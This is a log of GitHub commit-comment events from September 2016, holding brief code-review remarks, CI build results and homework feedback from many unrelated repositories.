{"id":"4576246265","type":"CommitCommentEvent","actor":{"login":"PanPalitta"},"repo":{"name":"PanPalitta/phase_estimation"},"payload":{"comment":{"id":19060112,"position":241,"line":241,"path":"src/phase_loss_rand.cpp","commit_id":"297d4afdcfea38048ac7e741cff894764efff41b","created_at":"2016-09-16T20:39:42Z","updated_at":"2016-09-16T20:39:42Z","body":"The state is a complex span of {|04>,|13>,|22>,|31>,|40>} as you said, but it is currently randomly generated using uniform distribution. So when you mention the Gaussian random state generation, it is on this basis, correct?"}},"created_at":"2016-09-16T20:39:42Z"}
{"id":"4576249790","type":"CommitCommentEvent","actor":{"login":"joshclouser"},"repo":{"name":"joshclouser/hello-world"},"payload":{"comment":{"id":19060119,"position":null,"line":null,"path":null,"commit_id":"79639c2daf46973b2cc7723a3525806de894184c","created_at":"2016-09-16T20:40:31Z","updated_at":"2016-09-16T20:40:31Z","body":"Hola. "}},"created_at":"2016-09-16T20:40:31Z"}
{"id":"4576253726","type":"CommitCommentEvent","actor":{"login":"tkelman"},"repo":{"name":"BBN-Q/QuantumInfo.jl"},"payload":{"comment":{"id":19060126,"position":null,"line":null,"path":null,"commit_id":"dbcc6b0a019b96e315f408ee02574a8939c2bbf4","created_at":"2016-09-16T20:41:21Z","updated_at":"2016-09-16T20:41:21Z","body":"importing will still extend the method from base and change the behavior of other code"}},"created_at":"2016-09-16T20:41:21Z"}
{"id":"4576255633","type":"CommitCommentEvent","actor":{"login":"twiest"},"repo":{"name":"rhdedgar/openshift-tools"},"payload":{"comment":{"id":19060129,"position":109,"line":109,"path":"openshift_tools/change_iam_password.py","commit_id":"7387847b281d4ac4256db7993971bc56d0cf75bc","created_at":"2016-09-16T20:41:46Z","updated_at":"2016-09-16T20:41:46Z","body":"Same, should be using argparse"}},"created_at":"2016-09-16T20:41:46Z"}
{"id":"4576258134","type":"CommitCommentEvent","actor":{"login":"ProximoBuild"},"repo":{"name":"NEventStore/NEventStore.Persistence.MongoDB"},"payload":{"comment":{"id":19060133,"position":null,"line":null,"path":null,"commit_id":"7d17bb175f86617e7bd57fd49f4bc53c58425b11","created_at":"2016-09-16T20:42:19Z","updated_at":"2016-09-16T20:42:19Z","body":"TeamCity NEventStore :: MongoDB :: Build [Build 6.0.0-unstable.79](http://build.prxm.it:8813/viewLog.html?buildId=3663&buildTypeId=nes_mongo_build&guest=1) outcome was **SUCCESS**\nSummary: Tests passed: 77 Build time: 00:02:27"}},"created_at":"2016-09-16T20:42:19Z"}
{"id":"4576258151","type":"CommitCommentEvent","actor":{"login":"ProximoBuild"},"repo":{"name":"NEventStore/NEventStore.Persistence.MongoDB"},"payload":{"comment":{"id":19060134,"position":null,"line":null,"path":null,"commit_id":"7d17bb175f86617e7bd57fd49f4bc53c58425b11","created_at":"2016-09-16T20:42:19Z","updated_at":"2016-09-16T20:42:19Z","body":"TeamCity NEventStore :: MongoDB :: Build [Build 6.0.0-unstable.79](http://build.prxm.it:8813/viewLog.html?buildId=3663&buildTypeId=nes_mongo_build&guest=1) outcome was **SUCCESS**\nSummary: Tests passed: 77 Build time: 00:02:27"}},"created_at":"2016-09-16T20:42:19Z"}
{"id":"4576260952","type":"CommitCommentEvent","actor":{"login":"twiest"},"repo":{"name":"rhdedgar/openshift-tools"},"payload":{"comment":{"id":19060141,"position":37,"line":37,"path":"openshift_tools/change_iam_password.py","commit_id":"7387847b281d4ac4256db7993971bc56d0cf75bc","created_at":"2016-09-16T20:43:00Z","updated_at":"2016-09-16T20:43:00Z","body":"I prefer to do classes over top level functions, that may the methods can share variables easily.\r\n\r\nHere's an example:\r\nhttps://github.com/openshift/openshift-tools/blob/stg/scripts/monitoring/ops-runner.py#L41-L48"}},"created_at":"2016-09-16T20:43:00Z"}
{"id":"4576263291","type":"CommitCommentEvent","actor":{"login":"rjmackay"},"repo":{"name":"ushahidi/platform-pattern-library"},"payload":{"comment":{"id":19060147,"position":null,"line":null,"path":null,"commit_id":"2e4d67e00905fc02503844deef603a97ac746f84","created_at":"2016-09-16T20:43:32Z","updated_at":"2016-09-16T20:43:32Z","body":"@brandonrosage I've removed all the built files from git again, they came back in with the architecture branch\r\nI think I got this right and only removed the built handlebars files.. but shout if I broke something. "}},"created_at":"2016-09-16T20:43:32Z"}
{"id":"4576277082","type":"CommitCommentEvent","actor":{"login":"EricDavies"},"repo":{"name":"priologic/easyrtc"},"payload":{"comment":{"id":19060176,"position":null,"line":null,"path":null,"commit_id":"1abeb80729ac243fe2e19b4c709fca3c95b6f0fd","created_at":"2016-09-16T20:46:35Z","updated_at":"2016-09-16T20:46:35Z","body":"yes, done when I was having issues with that grunt build_api. I'll apply the same changes to the easyrtc_int.js based on the git diffs. Shouldn't take too much effort."}},"created_at":"2016-09-16T20:46:35Z"}
{"id":"4576277631","type":"CommitCommentEvent","actor":{"login":"mthrasher33"},"repo":{"name":"mthrasher33/minneapolis311calls"},"payload":{"comment":{"id":19060178,"position":null,"line":null,"path":null,"commit_id":"b0311248fc61100719a93f01bb8f127c4b70ca4f","created_at":"2016-09-16T20:46:43Z","updated_at":"2016-09-16T20:46:43Z","body":"Nice, dude. "}},"created_at":"2016-09-16T20:46:43Z"}
{"id":"4576281408","type":"CommitCommentEvent","actor":{"login":"LucDemortier"},"repo":{"name":"echin6/dsp"},"payload":{"comment":{"id":19060187,"position":null,"line":null,"path":null,"commit_id":"83a21e5b9e118bb6e252661408c41565cbb9d927","created_at":"2016-09-16T20:47:35Z","updated_at":"2016-09-16T20:47:35Z","body":"RE: 05b-python_advanced.md\r\ncc: @lucdemortier @reshamametis @aramnath @gfsoileau @julialintern @galvin-mj\r\n\r\nHello @echin6 \r\n\r\nNice work on advanced Python! Some comments:\r\n- Part of the exercises consists in using regular expressions to detect identical field values. For example, `Ph.D.` means the same thing as `PhD` or `PhD.`.  Without taking this into account, counts are not very useful.\r\n- Nice use of Pandas to print pretty tables!\r\n- Write to csv file (Q5): You forgot to close the file `faculty.csv` with `f.close()`.\r\n- For Q8, we wanted a dictionary whose keys include both first and last names, but ordered by last names.\r\n\r\n👍 \r\n"}},"created_at":"2016-09-16T20:47:35Z"}
{"id":"4576283703","type":"CommitCommentEvent","actor":{"login":"drychlik76"},"repo":{"name":"angular/angular"},"payload":{"comment":{"id":19060191,"position":null,"line":null,"path":null,"commit_id":"ffe5c49c3ebb51d534a339e0d85a0aa7967923dc","created_at":"2016-09-16T20:48:04Z","updated_at":"2016-09-16T20:48:04Z","body":"YAY"}},"created_at":"2016-09-16T20:48:04Z"}
{"id":"4576284384","type":"CommitCommentEvent","actor":{"login":"Matchstic"},"repo":{"name":"QwopJoans/InfoStats2"},"payload":{"comment":{"id":19060193,"position":null,"line":null,"path":null,"commit_id":"8c0709d4791d8bcaa712e6dae40a5c4b4cda0d71","created_at":"2016-09-16T20:48:14Z","updated_at":"2016-09-16T20:48:14Z","body":"Using Cycript over SSH is my preferred way of testing if that's a help? Rather than doing it all in-widget."}},"created_at":"2016-09-16T20:48:14Z"}
{"id":"4576284428","type":"CommitCommentEvent","actor":{"login":"zacharyacutey"},"repo":{"name":"JoinRajuncraftNow/CSE"},"payload":{"comment":{"id":19060194,"position":null,"line":null,"path":null,"commit_id":"aa4d28263c904937daf6d239377d556704d44f0a","created_at":"2016-09-16T20:48:15Z","updated_at":"2016-09-16T20:48:15Z","body":"ALEX!!!!!!!!!!!"}},"created_at":"2016-09-16T20:48:15Z"}
{"id":"4576287306","type":"CommitCommentEvent","actor":{"login":"nrel-bot-3"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":19060205,"position":null,"line":null,"path":null,"commit_id":"849b49181116b891d2824379be5701c9037e1119","created_at":"2016-09-16T20:48:53Z","updated_at":"2016-09-16T20:48:53Z","body":"EMS (brianlball) - x86_64-MacOS-10.10-clang: OK (2299 of 2472 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-849b49181116b891d2824379be5701c9037e1119-x86_64-MacOS-10.10-clang.html'>![Build Badge](http://img.shields.io/badge/build%20status-warnings-yellow.svg)</a> <a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-849b49181116b891d2824379be5701c9037e1119-x86_64-MacOS-10.10-clang.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-93.0%25-yellow.svg)</a> \n"}},"created_at":"2016-09-16T20:48:53Z"}
{"id":"4576293294","type":"CommitCommentEvent","actor":{"login":"meersjo"},"repo":{"name":"dankow/ansible-mysql-cve-2016-6662"},"payload":{"comment":{"id":19060212,"position":null,"line":null,"path":null,"commit_id":"02cf708ed12dff30978bdfbd607a8bc04c641953","created_at":"2016-09-16T20:50:18Z","updated_at":"2016-09-16T20:50:18Z","body":"I'm wondering why you want to use my_print_defaults instead of mysqld to fetch the information? I've just run an strace on the mysqld call, and it doesn't try to access any datafiles at all - the --help option short-circuits that whole branch.\r\n\r\n@dankow , Are there any tangible benefits to my_print_defaults?\r\n@gryppyrg , @cezmunsta, is there a specific reason why your script uses mysqld instead of my_print_defaults?"}},"created_at":"2016-09-16T20:50:18Z"}
{"id":"4576298303","type":"CommitCommentEvent","actor":{"login":"irfanG"},"repo":{"name":"EnaTopoljak/Zadace"},"payload":{"comment":{"id":19060223,"position":null,"line":null,"path":null,"commit_id":"bbcc0aac3e4614264051d9ae80730d4d3d449e3f","created_at":"2016-09-16T20:51:27Z","updated_at":"2016-09-16T20:51:27Z","body":"cao ena, na dobrom si puto da zavrsis, ali jos uvijek nisi otklonila sve buggove npr:\r\nslika na tableView se ne prikazuje\r\nne moze se snimiti meal\r\nne moze se rating promjeniti\r\n\r\n:)\r\n"}},"created_at":"2016-09-16T20:51:27Z"}
{"id":"4576300021","type":"CommitCommentEvent","actor":{"login":"QwopJoans"},"repo":{"name":"QwopJoans/InfoStats2"},"payload":{"comment":{"id":19060226,"position":null,"line":null,"path":null,"commit_id":"8c0709d4791d8bcaa712e6dae40a5c4b4cda0d71","created_at":"2016-09-16T20:51:52Z","updated_at":"2016-09-16T20:51:52Z","body":"Yeah I should probably do that, the problem here was that [[objc_getClass(\"MPMusicPlayerController\") systemMusicPlayer] playbackState] only returns a value for anything that uses the system music player, which I then found out Pandora does not. But SSH would probably be better, I'm just kinda lazy "}},"created_at":"2016-09-16T20:51:52Z"}
{"id":"4576300278","type":"CommitCommentEvent","actor":{"login":"AleBabbu"},"repo":{"name":"AleBabbu/testGit"},"payload":{"comment":{"id":19060228,"position":null,"line":null,"path":null,"commit_id":"d4bc2e61be80ff65835086068732940cd3d3cfe9","created_at":"2016-09-16T20:51:56Z","updated_at":"2016-09-16T20:51:56Z","body":"a"}},"created_at":"2016-09-16T20:51:56Z"}
{"id":"4576300351","type":"CommitCommentEvent","actor":{"login":"zepster"},"repo":{"name":"zepster/qq"},"payload":{"comment":{"id":19060229,"position":70,"line":70,"path":"lib/ContactEntry.php","commit_id":"3f41e2be218d626f4f0b9e6919a303d777a8af2e","created_at":"2016-09-16T20:51:57Z","updated_at":"2016-09-16T20:51:57Z","body":"Нуджен ид группы. можно его хранить на групЕнтри"}},"created_at":"2016-09-16T20:51:57Z"}
{"id":"4576302848","type":"CommitCommentEvent","actor":{"login":"ProximoBuild"},"repo":{"name":"NEventStore/NEventStore"},"payload":{"comment":{"id":19060241,"position":null,"line":null,"path":null,"commit_id":"9bbd55e112f1967c4e63de0afdcf1607662da2af","created_at":"2016-09-16T20:52:29Z","updated_at":"2016-09-16T20:52:29Z","body":"TeamCity NEventStore :: Core :: Build [Build 6.0.0-unstable.96](http://build.prxm.it:8813/viewLog.html?buildId=3664&buildTypeId=NEventStore_CI&guest=1) outcome was **SUCCESS**\nSummary: Tests passed: 250 Build time: 00:01:38"}},"created_at":"2016-09-16T20:52:29Z"}
{"id":"4576303281","type":"CommitCommentEvent","actor":{"login":"ebaydayz"},"repo":{"name":"EpochModTeam/DayZ-Epoch"},"payload":{"comment":{"id":19060242,"position":null,"line":null,"path":null,"commit_id":"e8e5d24e80f77268c8befa38680ccd9de6c03452","created_at":"2016-09-16T20:52:35Z","updated_at":"2016-09-16T20:52:35Z","body":"@ndavalos is correct. HideObject disables collision so that's why. I'll remove that line."}},"created_at":"2016-09-16T20:52:35Z"}
{"id":"4576307191","type":"CommitCommentEvent","actor":{"login":"sh999"},"repo":{"name":"sh999/exonized-alu"},"payload":{"comment":{"id":19060246,"position":64,"line":131,"path":"exonized/Alu_Col.cpp","commit_id":"cce3e8d29c73565e427145cfe7589009ed368eac","created_at":"2016-09-16T20:53:26Z","updated_at":"2016-09-16T20:53:26Z","body":"Key fix is after adding all alus to filtered alus, then connect the filtered alus to genome.  Trying to do connect with genome during filtering was problematic due to changing of element addresses during vector push_back"}},"created_at":"2016-09-16T20:53:26Z"}
{"id":"4576309230","type":"CommitCommentEvent","actor":{"login":"grandbora"},"repo":{"name":"grandbora/prometheus"},"payload":{"comment":{"id":19060250,"position":6,"line":312,"path":"web/web.go","commit_id":"802a0a61727e9c8ebad13842b776865fd42ba443","created_at":"2016-09-16T20:53:55Z","updated_at":"2016-09-16T20:53:55Z","body":"No worries, I shouldn't have done late integration."}},"created_at":"2016-09-16T20:53:55Z"}
{"id":"4576309488","type":"CommitCommentEvent","actor":{"login":"chip594"},"repo":{"name":"chip594/Name-List-Editor-1"},"payload":{"comment":{"id":19060254,"position":null,"line":null,"path":null,"commit_id":"34a79d96c65153ac3b51a3530979ef4890dcf7e3","created_at":"2016-09-16T20:53:58Z","updated_at":"2016-09-16T20:53:58Z","body":"Duplicate file"}},"created_at":"2016-09-16T20:53:58Z"}
{"id":"4576316297","type":"CommitCommentEvent","actor":{"login":"irfanG"},"repo":{"name":"aadma/Zadace"},"payload":{"comment":{"id":19060261,"position":null,"line":null,"path":null,"commit_id":"1caafaf831b4a5403fd51b66330ba7f6c11ad00a","created_at":"2016-09-16T20:55:28Z","updated_at":"2016-09-16T20:55:28Z","body":"koliko vidim fali ti jos samo da vidis detalje vec postojeceg jela\r\n\r\nkompletan zadatak imas u debugging zadatku pa mozes pogledati"}},"created_at":"2016-09-16T20:55:28Z"}
{"id":"4576320228","type":"CommitCommentEvent","actor":{"login":"platinumazure"},"repo":{"name":"jquery/qunit"},"payload":{"comment":{"id":19060267,"position":null,"line":null,"path":null,"commit_id":"89731f969e6ab9201149c0a1d23767aec6ca72d9","created_at":"2016-09-16T20:56:18Z","updated_at":"2016-09-16T20:56:18Z","body":"I've spotted the indentation problems in Gruntfile.js-- sorry for missing those. I'll write a PR this weekend fixing that and a few other indentation problems I've spotted."}},"created_at":"2016-09-16T20:56:18Z"}
{"id":"4576328787","type":"CommitCommentEvent","actor":{"login":"ElbertoOne"},"repo":{"name":"ElbertoOne/Stockfish"},"payload":{"comment":{"id":19060283,"position":null,"line":null,"path":null,"commit_id":"263a9efd9bdb6421badcba2517d1052b3a4d025b","created_at":"2016-09-16T20:58:08Z","updated_at":"2016-09-16T20:58:08Z","body":"Ok, here we go: http://tests.stockfishchess.org/tests/view/57dc5cb20ebc59030fbe541c\r\n:-)"}},"created_at":"2016-09-16T20:58:08Z"}
{"id":"4576334037","type":"CommitCommentEvent","actor":{"login":"billyrubin"},"repo":{"name":"zepster/qq"},"payload":{"comment":{"id":19060296,"position":70,"line":70,"path":"lib/ContactEntry.php","commit_id":"3f41e2be218d626f4f0b9e6919a303d777a8af2e","created_at":"2016-09-16T20:59:17Z","updated_at":"2016-09-16T20:59:17Z","body":"Вот поэтому в конструктор и нужно передавать отдельно все параметры. В том числе и ид. группы."}},"created_at":"2016-09-16T20:59:17Z"}
{"id":"4576334408","type":"CommitCommentEvent","actor":{"login":"petebacondarwin"},"repo":{"name":"angular-workshops/angular2-testing"},"payload":{"comment":{"id":19060298,"position":23,"line":23,"path":"package.json","commit_id":"770043ba84b596a3001d5e92abe6cc7b72d7b1ad","created_at":"2016-09-16T20:59:21Z","updated_at":"2016-09-16T20:59:21Z","body":"is this a tab character?"}},"created_at":"2016-09-16T20:59:21Z"}
{"id":"4576336451","type":"CommitCommentEvent","actor":{"login":"sebright"},"repo":{"name":"google/census-java"},"payload":{"comment":{"id":19060304,"position":null,"line":null,"path":null,"commit_id":"26073e34b588752eb21a83b604704caf256cc846","created_at":"2016-09-16T20:59:49Z","updated_at":"2016-09-16T20:59:49Z","body":"Can we assume that UTF-8 is always available?"}},"created_at":"2016-09-16T20:59:49Z"}
{"id":"4576336990","type":"CommitCommentEvent","actor":{"login":"Ma27"},"repo":{"name":"Sententiaregum/sententiaregum-flux-react"},"payload":{"comment":{"id":19060306,"position":null,"line":null,"path":null,"commit_id":"e52a1108f472fa6e7e16a0f40450ef0cc95f1d79","created_at":"2016-09-16T20:59:56Z","updated_at":"2016-09-16T20:59:56Z","body":"ok, thanks for the feedback @benbieler. Will write some docs and then tag the release :)"}},"created_at":"2016-09-16T20:59:56Z"}
{"id":"4576337735","type":"CommitCommentEvent","actor":{"login":"LucDemortier"},"repo":{"name":"echin6/dsp"},"payload":{"comment":{"id":19060307,"position":null,"line":null,"path":null,"commit_id":"41b81c10fcdb39009177f1f3c1c7f004e288925c","created_at":"2016-09-16T21:00:07Z","updated_at":"2016-09-16T21:00:07Z","body":"RE: 07-linear_algebra.md\r\ncc: @lucdemortier @reshamametis @aramnath @gfsoileau @julialintern @galvin-mj\r\n\r\nHello @echin6 \r\n\r\nNice work on the linear algebra! Note however that you didn't input the B matrix correctly. It should be `B_array = np.array([[1, -1], [0, 1]])` instead of `B_array = np.array([[1, -1], [0, -1]])`. As a result, your results for BA, CB, and B<sup>4</sup> are incorrect.\r\n\r\n👍 "}},"created_at":"2016-09-16T21:00:07Z"}
{"id":"4576338699","type":"CommitCommentEvent","actor":{"login":"MayeulChassagnard"},"repo":{"name":"MayeulChassagnard/CTK"},"payload":{"comment":{"id":19060310,"position":null,"line":null,"path":null,"commit_id":"f7f1d45b681755e39ba9ef59c8a6981e79a475a0","created_at":"2016-09-16T21:00:18Z","updated_at":"2016-09-16T21:00:18Z","body":"@jcfr\r\n\r\nThere is still some minor errors like using `PyRun_SimpleString` will print stuff  during the tabulation if there is some things to print: \r\n![still an error with pyrun_simplestring](https://cloud.githubusercontent.com/assets/20341270/18600878/ef756a26-7c2d-11e6-95ee-4270e75211a0.png)\r\n\r\nLet me know:\r\n* if there is other bugs with this hack\r\n* if I must change of solution or keep the same way to think about this problem\r\n* if you think about a function similar to `PyRun_SimpleString` (something which doesn't call print stuff or if you find a way to solve the [previous version](https://github.com/MayeulChassagnard/CTK/commit/4c36ce01b64c7ad203128a4dc99ad381f43e8ab4))"}},"created_at":"2016-09-16T21:00:18Z"}
{"id":"4576341767","type":"CommitCommentEvent","actor":{"login":"xueliangsun"},"repo":{"name":"jasperlsy26/Cpts422"},"payload":{"comment":{"id":19060313,"position":null,"line":null,"path":null,"commit_id":"d90476949006636bb2a955215ef43705d643615d","created_at":"2016-09-16T21:00:54Z","updated_at":"2016-09-16T21:00:54Z","body":"webserver class incomplete"}},"created_at":"2016-09-16T21:00:54Z"}
{"id":"4576343116","type":"CommitCommentEvent","actor":{"login":"petebacondarwin"},"repo":{"name":"angular-workshops/angular2-testing"},"payload":{"comment":{"id":19060316,"position":1,"line":1,"path":"src/app/dashboard.component.spec.ts","commit_id":"770043ba84b596a3001d5e92abe6cc7b72d7b1ad","created_at":"2016-09-16T21:01:12Z","updated_at":"2016-09-16T21:01:12Z","body":"My first task when working with CLI would be to remove all of these tslint commands. They only put them in here, I reckon, so that the generated files pass the tslint run"}},"created_at":"2016-09-16T21:01:12Z"}
{"id":"4576345215","type":"CommitCommentEvent","actor":{"login":"petebacondarwin"},"repo":{"name":"angular-workshops/angular2-testing"},"payload":{"comment":{"id":19060322,"position":2,"line":1,"path":"src/main.ts","commit_id":"770043ba84b596a3001d5e92abe6cc7b72d7b1ad","created_at":"2016-09-16T21:01:38Z","updated_at":"2016-09-16T21:01:38Z","body":"Do we really need a `.ts` here?"}},"created_at":"2016-09-16T21:01:38Z"}
{"id":"4576347161","type":"CommitCommentEvent","actor":{"login":"petebacondarwin"},"repo":{"name":"angular-workshops/angular2-testing"},"payload":{"comment":{"id":19060328,"position":6,"line":8,"path":"src/typings.d.ts","commit_id":"770043ba84b596a3001d5e92abe6cc7b72d7b1ad","created_at":"2016-09-16T21:02:05Z","updated_at":"2016-09-16T21:02:05Z","body":"Nice to see these bits gone :-)"}},"created_at":"2016-09-16T21:02:05Z"}
{"id":"4576349847","type":"CommitCommentEvent","actor":{"login":"xiazen"},"repo":{"name":"attilah/orleans"},"payload":{"comment":{"id":19060332,"position":49,"line":49,"path":"src/Documentation/Advanced-Concepts/Dependency-Injection.md","commit_id":"ea80c24148f1e905ceda16b97a521a875beff140","created_at":"2016-09-16T21:02:28Z","updated_at":"2016-09-16T21:02:28Z","body":"I think we need to call out here that : `StartUp `class should implement one method called \r\n`public IServiceProvider ConfigureServices(IServiceCollection services)`, which is the method silo is looking for when constructing IServiceProvider.  "}},"created_at":"2016-09-16T21:02:28Z"}
{"id":"4576349941","type":"CommitCommentEvent","actor":{"login":"kaitek666"},"repo":{"name":"etlegacy/etlegacy"},"payload":{"comment":{"id":19060335,"position":24,"line":7117,"path":"etmain/locale/mod/pl.po","commit_id":"db7aa6c883f41330e69ee7480ed938e47265f9dd","created_at":"2016-09-16T21:02:29Z","updated_at":"2016-09-16T21:02:29Z","body":"Oh god please no. No. Renderer can't be translated. Please reverse it "}},"created_at":"2016-09-16T21:02:29Z"}
{"id":"4576352851","type":"CommitCommentEvent","actor":{"login":"petebacondarwin"},"repo":{"name":"angular-workshops/angular2-testing"},"payload":{"comment":{"id":19060343,"position":null,"line":null,"path":null,"commit_id":"770043ba84b596a3001d5e92abe6cc7b72d7b1ad","created_at":"2016-09-16T21:03:08Z","updated_at":"2016-09-16T21:03:08Z","body":"Nice work @joeeames !!"}},"created_at":"2016-09-16T21:03:08Z"}
{"id":"4576354163","type":"CommitCommentEvent","actor":{"login":"lewismc"},"repo":{"name":"mudrod/mudrod"},"payload":{"comment":{"id":19060346,"position":null,"line":null,"path":null,"commit_id":"07a78c31d8aaad9fba6e9a0a7c4c1243a9b8c6d8","created_at":"2016-09-16T21:03:25Z","updated_at":"2016-09-16T21:03:25Z","body":"@Yongyao can you please merge this with the spark2.0.0 branch and we will work from the spark2.0.0 branch from now on?"}},"created_at":"2016-09-16T21:03:25Z"}
{"id":"4576354982","type":"CommitCommentEvent","actor":{"login":"lewismc"},"repo":{"name":"mudrod/mudrod"},"payload":{"comment":{"id":19060350,"position":null,"line":null,"path":null,"commit_id":"07a78c31d8aaad9fba6e9a0a7c4c1243a9b8c6d8","created_at":"2016-09-16T21:03:36Z","updated_at":"2016-09-16T21:03:36Z","body":"BTW, good improvement. I think this makes more sense."}},"created_at":"2016-09-16T21:03:36Z"}
{"id":"4576362251","type":"CommitCommentEvent","actor":{"login":"emanuele45"},"repo":{"name":"emanuele45/Dialogo"},"payload":{"comment":{"id":19060367,"position":7,"line":789,"path":"install/Install_Controller.php","commit_id":"bb16cdc4e74435a5f44aced379d0e169a568edfc","created_at":"2016-09-16T21:05:13Z","updated_at":"2016-09-16T21:05:13Z","body":"At CREATE TABLE-time yes (see later), and I'm pretty sure this replace was not working.\r\nI feel this was calibrated on the old sql files, where any CREATE TABLE ended exactly with ```) ENGINE=MyISAM;```, while in the new (unified) version of the install files, the queries end with the string changed here below:\r\nhttps://github.com/emanuele45/Dialogo/commit/bb16cdc4e74435a5f44aced379d0e169a568edfc#diff-fecaaf84645f1025fa45ab1dfcfc691dL147\r\n\r\nBTW, I didn't get any notification for that comment... :-\\\r\nI saw it by chance while answering to the other one."}},"created_at":"2016-09-16T21:05:13Z"}
{"id":"4576365913","type":"CommitCommentEvent","actor":{"login":"ProximoBuild"},"repo":{"name":"NEventStore/NEventStore.Persistence.MongoDB"},"payload":{"comment":{"id":19060374,"position":null,"line":null,"path":null,"commit_id":"7e562994b4cde82eeee2434020969839f477eb4a","created_at":"2016-09-16T21:06:02Z","updated_at":"2016-09-16T21:06:02Z","body":"TeamCity NEventStore :: MongoDB :: Build [Build 6.0.0-unstable.80](http://build.prxm.it:8813/viewLog.html?buildId=3665&buildTypeId=nes_mongo_build&guest=1) outcome was **SUCCESS**\nSummary: Tests passed: 77 Build time: 00:02:27"}},"created_at":"2016-09-16T21:06:02Z"}
{"id":"4576366095","type":"CommitCommentEvent","actor":{"login":"ProximoBuild"},"repo":{"name":"NEventStore/NEventStore.Persistence.MongoDB"},"payload":{"comment":{"id":19060375,"position":null,"line":null,"path":null,"commit_id":"7e562994b4cde82eeee2434020969839f477eb4a","created_at":"2016-09-16T21:06:05Z","updated_at":"2016-09-16T21:06:05Z","body":"TeamCity NEventStore :: MongoDB :: Build [Build 6.0.0-unstable.80](http://build.prxm.it:8813/viewLog.html?buildId=3665&buildTypeId=nes_mongo_build&guest=1) outcome was **SUCCESS**\nSummary: Tests passed: 77 Build time: 00:02:27"}},"created_at":"2016-09-16T21:06:05Z"}
{"id":"4576368295","type":"CommitCommentEvent","actor":{"login":"jdom"},"repo":{"name":"attilah/orleans"},"payload":{"comment":{"id":19060384,"position":14,"line":52,"path":"src/Documentation/Advanced-Concepts/Dependency-Injection.md","commit_id":"4532d2ffba1afce5fa28115ab41dee104dba2c74","created_at":"2016-09-16T21:06:33Z","updated_at":"2016-09-16T21:06:33Z","body":"I would emphasize (put first) configuring from code."}},"created_at":"2016-09-16T21:06:33Z"}
{"id":"4576373609","type":"CommitCommentEvent","actor":{"login":"xiazen"},"repo":{"name":"attilah/orleans"},"payload":{"comment":{"id":19060394,"position":34,"line":34,"path":"src/Documentation/Advanced-Concepts/Dependency-Injection.md","commit_id":"ea80c24148f1e905ceda16b97a521a875beff140","created_at":"2016-09-16T21:07:45Z","updated_at":"2016-09-16T21:07:45Z","body":"It must return an object instance of type: `IServiceProvider` and take `IServiceCollection` as single input parameter.\r\n\r\nI think `ConfigureServices` must have an input param `IServiceCollection `now for `StartupBuilder `to use it"}},"created_at":"2016-09-16T21:07:45Z"}
{"id":"4576375920","type":"CommitCommentEvent","actor":{"login":"marcusps"},"repo":{"name":"BBN-Q/QuantumInfo.jl"},"payload":{"comment":{"id":19060401,"position":null,"line":null,"path":null,"commit_id":"dbcc6b0a019b96e315f408ee02574a8939c2bbf4","created_at":"2016-09-16T21:08:18Z","updated_at":"2016-09-16T21:08:18Z","body":"Even if I don't export those methods?"}},"created_at":"2016-09-16T21:08:18Z"}
{"id":"4576377723","type":"CommitCommentEvent","actor":{"login":"jdom"},"repo":{"name":"attilah/orleans"},"payload":{"comment":{"id":19060403,"position":33,"line":33,"path":"src/Documentation/Advanced-Concepts/Dependency-Injection.md","commit_id":"ea80c24148f1e905ceda16b97a521a875beff140","created_at":"2016-09-16T21:08:44Z","updated_at":"2016-09-16T21:08:44Z","body":"I think this warrants having a small code sample with the entire shape of the expected Startup type."}},"created_at":"2016-09-16T21:08:44Z"}
{"id":"4576381438","type":"CommitCommentEvent","actor":{"login":"pajaree"},"repo":{"name":"blockchain/My-Wallet-V3"},"payload":{"comment":{"id":19060417,"position":2,"line":279,"path":"src/api.js","commit_id":"bbbd67270620313ce67e6a5d2759fd7539f18005","created_at":"2016-09-16T21:09:36Z","updated_at":"2016-09-16T21:09:36Z","body":"      .catch(handleNetworkError);"}},"created_at":"2016-09-16T21:09:36Z"}
{"id":"4576382543","type":"CommitCommentEvent","actor":{"login":"daniktheboss"},"repo":{"name":"DarkWav/AntiCheat"},"payload":{"comment":{"id":19060419,"position":null,"line":null,"path":null,"commit_id":"abb0524969ba6b42f5e912ac07959f311588a1de","created_at":"2016-09-16T21:09:50Z","updated_at":"2016-09-16T21:09:50Z","body":"Can I take over? I implemented a feature to log to console but never had the time to commit.... can you please invite me to group and I will keep plug in updated and stuff"}},"created_at":"2016-09-16T21:09:50Z"}
{"id":"4576384125","type":"CommitCommentEvent","actor":{"login":"veksen"},"repo":{"name":"lodash/lodash.com"},"payload":{"comment":{"id":19060424,"position":null,"line":null,"path":null,"commit_id":"91cd155bf3a93f051bb11dfb1b538fd5a63f6146","created_at":"2016-09-16T21:10:13Z","updated_at":"2016-09-16T21:10:13Z","body":"That makes sense. :+1:"}},"created_at":"2016-09-16T21:10:13Z"}
{"id":"4576387936","type":"CommitCommentEvent","actor":{"login":"soumak77"},"repo":{"name":"base-apps/angular-base-apps-template"},"payload":{"comment":{"id":19060432,"position":23,"line":35,"path":"brunch-config.js","commit_id":"dce1642b0a106c6539ed993b0a11cd6b43c90fc0","created_at":"2016-09-16T21:11:04Z","updated_at":"2016-09-16T21:11:04Z","body":"@tolyo @franbenz my original intent with adding this was to only warn on `config-routes.js`, but since that isn't possible, the exclusion of the file in the regex is enough.  The rest of the build should still fail from the linter so I'll remove the `warnOnly: true`."}},"created_at":"2016-09-16T21:11:04Z"}
{"id":"4576388446","type":"CommitCommentEvent","actor":{"login":"Phyronnaz"},"repo":{"name":"Phyronnaz/TIPE_Hex"},"payload":{"comment":{"id":19060433,"position":null,"line":null,"path":null,"commit_id":"d32fc60167f4987f4b7baa372902ab9fa57e2b15","created_at":"2016-09-16T21:11:11Z","updated_at":"2016-09-16T21:11:11Z","body":"<a href=\"https:&#x2F;&#x2F;trello.com&#x2F;c&#x2F;K13AIxbz&#x2F;11-play-a-move\"><img src=\"https:&#x2F;&#x2F;github.trello.services&#x2F;images&#x2F;trello-icon.png\" width=\"12\" height=\"12\"> Play a move</a>"}},"created_at":"2016-09-16T21:11:11Z"}
